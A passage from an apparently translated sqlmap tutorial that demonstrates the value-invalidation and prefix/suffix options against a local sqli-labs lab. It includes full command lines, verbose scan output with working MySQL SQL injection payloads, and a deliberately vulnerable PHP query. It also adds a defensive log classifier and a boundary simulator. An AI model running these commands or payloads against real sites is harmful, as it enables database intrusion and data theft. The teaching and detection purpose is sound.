[09:46:07] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 09:46:07 /2020-03-01/


3. Forcing the value-invalidation method in sqlmap

The --invalid-bignum parameter

When sqlmap needs to invalidate the original parameter value (e.g. id=13), it uses the classic negation (e.g. id=-13).
With --invalid-bignum, it can be forced to use a large integer value to achieve the same goal (e.g. id=99999999).
Test:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --invalid-bignum --banner -v 5

Output: the verbose output contains
Payload: id=462284' UNION ALL SELECT NULL,NULL,CONCAT(0x71706b6a71,0x676b6a4b566742436e7a6763484c4d6b6d4c6e61736141644542466a65725072454d6a6852677855,0x717a6b6a71)-- -
i.e. during detection id was set to the large value 462284.

The --invalid-logical parameter

With --invalid-logical, sqlmap can be forced to use a boolean operation to achieve the same goal (e.g. id=13 AND 18=19).
Test:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --invalid-logical --banner

Output:

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:08:58 /2020-03-01/

[10:08:59] [INFO] testing connection to the target URL
[10:08:59] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:08:59] [INFO] testing if the target URL content is stable
[10:08:59] [INFO] target URL content is stable
[10:08:59] [INFO] testing if GET parameter 'id' is dynamic
[10:08:59] [INFO] GET parameter 'id' appears to be dynamic
[10:08:59] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:08:59] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[10:08:59] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[10:09:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:09:01] [WARNING] reflective value(s) found and filtering out
[10:09:02] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[10:09:02] [INFO] testing 'Generic inline queries'
[10:09:02] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[10:09:02] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[10:09:02] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[10:09:02] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[10:09:02] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[10:09:02] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[10:09:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:09:02] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[10:09:02] [INFO] testing 'MySQL inline queries'
[10:09:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[10:09:02] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[10:09:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[10:09:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[10:09:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[10:09:02] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[10:09:02] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:09:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:09:12] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[10:09:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:09:12] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:09:12] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[10:09:12] [INFO] target URL appears to have 3 columns in query
[10:09:12] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 3467=3467 AND 'vjnx'='vjnx

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8283 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(8283=8283,1))),0x716b7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'whel'='whel

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 7542 FROM (SELECT(SLEEP(5)))AXCz) AND 'TpNY'='TpNY

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1' AND 71 LIKE 72 UNION ALL SELECT NULL,CONCAT(0x716b627a71,0x4846764a516c586f4e7a4b5853725a43434f57454a5552516a4a494d576c494d4f61615353787549,0x716b7a7871),NULL-- -
---
[10:09:15] [INFO] the back-end DBMS is MySQL
[10:09:15] [INFO] fetching banner
[10:09:15] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[10:09:15] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'

[*] ending @ 10:09:15 /2020-03-01/


Clearly, the output contains
Payload: id=1' AND 71 LIKE 72 UNION ALL SELECT NULL,CONCAT(0x716b627a71,0x4846764a516c586f4e7a4b5853725a43434f57454a5552516a4a494d576c494d4f61615353787549,0x716b7a7871),NULL-- -
with the always-false condition 71 LIKE 72.
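The invalidation styles this subsection describes (plain negation, --invalid-bignum, --invalid-logical, and --invalid-string, which the next subsection covers) each leave a characteristic value in the web server's access log. The following is an added example written for this post, not code from the article or from sqlmap: it classifies query-string values from a few constructed log lines into those styles so a defender can recognise them server-side. The log lines, the user-agent string and BIGNUM_THRESHOLD are constructed assumptions; only the payload shapes are taken from the outputs shown on this page.

```python
"""Spot sqlmap-style "invalidated" parameter values in web server access logs.

Added example for this post; not code from the original article or from sqlmap.
It models the four ways this section describes sqlmap making the original value
invalid (negation id=-13, --invalid-bignum id=99999999, --invalid-logical
id=13 AND 18=19, --invalid-string id=akewmc) and reports which one each request
in a few constructed log lines looks like. SAMPLE_LOG, the user-agent string and
BIGNUM_THRESHOLD are constructed assumptions, not data from the post.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qsl, urlsplit

# Assumption: legitimate ids on this application are well below this value.
BIGNUM_THRESHOLD = 100_000

# "13 AND 18=19" style: leading number, optional quote, then a numeric comparison.
LOGICAL_RE = re.compile(
    r"^\s*-?\d+'?\s+(?:AND|OR)\s+(\d+)\s*(=|<>|!=|LIKE)\s*(\d+)", re.IGNORECASE
)
# sqlmap's random replacement string: a short run of lowercase letters.
RANDSTRING_RE = re.compile(r"^[a-z]{4,}$")
# Combined-log request field: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_value(value: str) -> Optional[str]:
    """Return the invalidation style a decoded parameter value matches, or None.

    Only a false comparison counts as --invalid-logical; a true one such as
    7504=7504 is a boolean-blind probe, which this example does not cover.
    """
    number = re.match(r"^(-?\d+)", value)
    if number:
        n = int(number.group(1))
        if n < 0:
            return "negation"
        if n >= BIGNUM_THRESHOLD:
            return "bignum"
        logical = LOGICAL_RE.match(value)
        if logical:
            left, op, right = logical.groups()
            equal = int(left) == int(right)
            is_false = (not equal) if op.upper() in ("=", "LIKE") else equal
            if is_false:
                return "logical"
        return None
    if RANDSTRING_RE.match(value):
        return "random-string"
    return None


def scan_log(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (parameter, style, decoded value) for every suspicious query parameter."""
    hits: List[Tuple[str, str, str]] = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            style = classify_value(value)
            if style:
                hits.append((name, style, value))
    return hits


# Constructed sample lines modelled on sqli-labs Less-1 requests; the payload
# shapes are the ones shown in this section, URL-encoded as a web server logs them.
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Mar/2020:10:08:59 +0800] "GET /sqli-labs/Less-1/?id=1 HTTP/1.1" 200 720 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [01/Mar/2020:10:09:12 +0800] "GET /sqli-labs/Less-1/?id=-8306%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL--%20- HTTP/1.1" 200 690 "-" "sqlmap/1.4.2.31#dev (http://sqlmap.org)"',
    '127.0.0.1 - - [01/Mar/2020:10:09:12 +0800] "GET /sqli-labs/Less-1/?id=462284%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL--%20- HTTP/1.1" 200 690 "-" "sqlmap/1.4.2.31#dev (http://sqlmap.org)"',
    '127.0.0.1 - - [01/Mar/2020:10:09:12 +0800] "GET /sqli-labs/Less-1/?id=1%27%20AND%2071%20LIKE%2072%20UNION%20ALL%20SELECT%20NULL,NULL,NULL--%20- HTTP/1.1" 200 690 "-" "sqlmap/1.4.2.31#dev (http://sqlmap.org)"',
    '127.0.0.1 - - [01/Mar/2020:10:24:44 +0800] "GET /sqli-labs/Less-1/?id=akewmc HTTP/1.1" 200 690 "-" "sqlmap/1.4.2.31#dev (http://sqlmap.org)"',
    '127.0.0.1 - - [01/Mar/2020:10:09:01 +0800] "GET /sqli-labs/Less-1/?id=1%27%20AND%207504=7504%20AND%20%27BNEG%27=%27BNEG HTTP/1.1" 200 720 "-" "sqlmap/1.4.2.31#dev (http://sqlmap.org)"',
]

if __name__ == "__main__":
    for name, style, value in scan_log(SAMPLE_LOG):
        print(f"{name}: {style:<14} {value}")
```

The classifier looks only at the leading token of the value, so it keys on the invalidation itself rather than on the UNION or SLEEP text that follows it; the last sample line shows why the logical check must evaluate the comparison, since a true condition is a different kind of probe and is deliberately not reported here.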

The --invalid-string parameter

With --invalid-string, sqlmap can be forced to use a random string to achieve the same goal (e.g. id=akewmc).
Test:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --invalid-string --banner

Output:

        ___                                                                                                                                               
       __H__                                                                                                                                              
 ___ ___[)]_____ ___ ___  {1.4.2.31#dev}                                                                                                                  
|_ -| . [(]     | .'| . |                                                                                                                                 
|___|_  [)]_|_|_|__,|  _|                                                                                                                                 
      |_|V...       |_|   http://sqlmap.org                                                                                                               
                                                                                                                                                          
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
                                                                                                                                                          
[*] starting @ 10:24:44 /2020-03-01/                                                                                                                      
                                                                                                                                                          
[10:24:44] [INFO] testing connection to the target URL                                                                                                    
[10:24:44] [INFO] checking if the target is protected by some kind of WAF/IPS                                                                             
[10:24:44] [INFO] testing if the target URL content is stable                                                                                             
[10:24:45] [INFO] target URL content is stable                                                                                                            
[10:24:45] [INFO] testing if GET parameter 'id' is dynamic                                                                                                
[10:24:45] [INFO] GET parameter 'id' appears to be dynamic                                                                                                
[10:24:45] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')                                       
[10:24:45] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks                            
[10:24:45] [INFO] testing for SQL injection on GET parameter 'id'                                                                                         
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]                                            
                                                                                                                                                          
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]                             
                                                                                                                                                          
[10:24:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'                                                                              
[10:24:48] [WARNING] reflective value(s) found and filtering out                                                                                          
[10:24:48] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")                   
[10:24:48] [INFO] testing 'Generic inline queries'                                                                                                        
[10:24:48] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'                                   
[10:24:48] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'                                                        
[10:24:48] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'                                               
[10:24:48] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'                                                                    
[10:24:49] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'                                       
[10:24:49] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'                                                            
[10:24:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'                                             
[10:24:49] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable                    
[10:24:49] [INFO] testing 'MySQL inline queries'                                                                                                          
[10:24:49] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'                                                                                     
[10:24:49] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)                                                   
[10:24:49] [INFO] testing 'MySQL >= 5.0.12 stacked queries'                                                                                               
[10:24:49] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'                                                                       
[10:24:49] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'                                                                                 
[10:24:49] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'                                                                        
[10:24:49] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'                                                                                  
[10:24:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'                                                                            
[10:24:59] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable                                        
[10:24:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'                                                                                  
[10:24:59] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found     
[10:24:59] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[10:24:59] [INFO] target URL appears to have 3 columns in query                                                                                           
[10:24:59] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable                                                         
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y                                                                
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:                                                                   
---                                                                                                                                                       
Parameter: id (GET)                                                                                                                                       
    Type: boolean-based blind                                                                                                                             
    Title: AND boolean-based blind - WHERE or HAVING clause                                                                                               
    Payload: id=1' AND 6118=6118 AND 'VaYg'='VaYg                                                                                                         
                                                                                                                                                          
    Type: error-based                                                                                                                                     
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)                                                              
    Payload: id=1' AND (SELECT 4130 FROM(SELECT COUNT(*),CONCAT(0x71626b7171,(SELECT (ELT(4130=4130,1))),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'stHh'='stHh
                                                                                                                                                          
    Type: time-based blind                                                                                                                                
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)                                                                                             
    Payload: id=1' AND (SELECT 9229 FROM (SELECT(SLEEP(5)))WerB) AND 'LqGE'='LqGE                                                                         
                                                                                                                                                          
    Type: UNION query                                                                                                                                     
    Title: Generic UNION query (NULL) - 3 columns                                                                                                         
    Payload: id=atUzqr' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7171,0x6765636e6d4f5655424e4870554575704574706c785866526a79697964754e774c6278726a4b6872,0x71706b7871)-- -
---                                                                                                                                                       
[10:25:03] [INFO] the back-end DBMS is MySQL                                                                                                              
[10:25:03] [INFO] fetching banner                                                                                                                         
[10:25:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'                          
back-end DBMS: MySQL >= 5.0                                                                                                                               
banner: '5.7.26'                                                                                                                                          
[10:25:03] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'                                         
                                                                                                                                                          
[*] ending @ 10:25:03 /2020-03-01/                                                                                                                        
                                                                                                                                                          

This time the payload
Payload: id=atUzqr' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7171,0x6765636e6d4f5655424e4870554575704574706c785866526a79697964754e774c6278726a4b6872,0x71706b7871)-- -
appeared, i.e. the random string atUzqr was forced into the parameter for the test.

4. Sqlmap: customizing the injection payload position

In some cases a vulnerable parameter can only be exploited if the user supplies a specific suffix to be appended to the injection payload.
When the user already knows the query syntax and wants to detect and exploit the SQL injection by supplying the payload prefix and suffix directly, the following options come in handy:

  • --prefix
    sets the prefix placed before the SQL injection payload
  • --suffix
    sets the suffix appended after the SQL injection payload
// vulnerable: the raw request parameter is concatenated straight into the query
$query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";

python sqlmap.py -u "http://ip/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "')" --suffix " AND ('abc'='abc"

# Together, the two lines above amount to the query
$query = "SELECT * FROM users WHERE id=('1') <PAYLOAD> AND ('abc'='abc') LIMIT 0, 1";
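To see why a prefix/suffix pair works on one query shape and fails on another, here is an added Python example (not from the original post and not sqlmap's code). The three query templates, the sample values and the payload `AND 1=1` are constructed for the illustration, and `is_balanced` is only a rough stand-in for the DBMS parser.

```python
"""Added example (not from the original post or from sqlmap): shows where the
--prefix and --suffix values land in the back-end query, and why they have to
match the query's quoting. Query templates and values are constructed here."""

# Templates modelled on the PHP snippet above; '{}' is where the raw request
# parameter is concatenated in. Only 'brackets' follows the page's
# get_str_brackets.php shape; the other two are hypothetical shapes for comparison.
TEMPLATES = {
    "brackets": "SELECT * FROM users WHERE id=('{}') LIMIT 0, 1",
    "single_quote": "SELECT * FROM users WHERE id='{}' LIMIT 0, 1",
    "numeric": "SELECT * FROM users WHERE id={} LIMIT 0, 1",
}


def splice(template, value, prefix, payload, suffix):
    """Build the SQL the server would execute. sqlmap sends the parameter as
    original value + prefix + payload + suffix, and the vulnerable code pastes
    that in unescaped. With a prepared statement the value would travel
    separately and no prefix/suffix could change the query's shape."""
    return template.format(value + prefix + " " + payload + suffix)


def is_balanced(sql):
    """Cheap sanity check standing in for the DBMS parser: outside single-quoted
    literals every '(' needs its ')', no ')' may close an unopened '(', and the
    statement must not end inside a literal. Text after an unquoted '-- ' is a
    comment and is ignored. Anything failing this is a syntax error in MySQL,
    so the payload never runs; from sqlmap's side that is what a wrong
    boundary looks like ('does not seem to be injectable')."""
    depth, in_str = 0, False
    i = 0
    while i < len(sql):
        ch = sql[i]
        if ch == "'":
            in_str = not in_str
        elif not in_str:
            if sql.startswith("-- ", i):
                break
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
                if depth < 0:
                    return False
        i += 1
    return depth == 0 and not in_str


def simulate(template_name, prefix, suffix, payload="AND 1=1"):
    """Return (final SQL, whether it is syntactically usable) for one boundary."""
    sql = splice(TEMPLATES[template_name], "1", prefix, payload, suffix)
    return sql, is_balanced(sql)


if __name__ == "__main__":
    cases = [
        ("brackets", "')", " AND ('abc'='abc"),      # the page's boundary on the matching query shape
        ("single_quote", "')", " AND ('abc'='abc"),  # same boundary, wrong query shape
        ("single_quote", "'", " AND 'VaYg'='VaYg"),  # boundary sqlmap picked by itself earlier on the page
        ("numeric", "", ""),                         # no quoting at all
    ]
    for name, pre, suf in cases:
        sql, ok = simulate(name, pre, suf)
        print(f"{name:13} {'OK ' if ok else 'BAD'} {sql}")
```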

Test it:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -p id --prefix "')" --suffix " AND ('abc'='abc"

Output:

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:38:09 /2020-03-01/

[10:38:09] [INFO] testing connection to the target URL
[10:38:09] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:38:09] [INFO] testing if the target URL content is stable
[10:38:10] [INFO] target URL content is stable
[10:38:10] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:38:10] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[10:38:10] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[10:38:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:38:12] [WARNING] reflective value(s) found and filtering out
[10:38:12] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:38:12] [INFO] testing 'Generic inline queries'
[10:38:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[10:38:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[10:38:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[10:38:12] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[10:38:12] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[10:38:12] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[10:38:12] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[10:38:12] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[10:38:12] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[10:38:12] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[10:38:12] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[10:38:12] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[10:38:12] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[10:38:12] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[10:38:12] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[10:38:12] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[10:38:12] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[10:38:12] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[10:38:12] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[10:38:12] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[10:38:12] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[10:38:12] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[10:38:12] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[10:38:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[10:38:12] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[10:38:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[10:38:12] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[10:38:12] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[10:38:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[10:38:13] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:38:13] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[10:38:13] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[10:38:13] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[10:38:13] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[10:38:13] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[10:38:13] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[10:38:13] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[10:38:13] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[10:38:13] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL inline queries'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[10:38:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[10:38:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[10:38:13] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[10:38:13] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
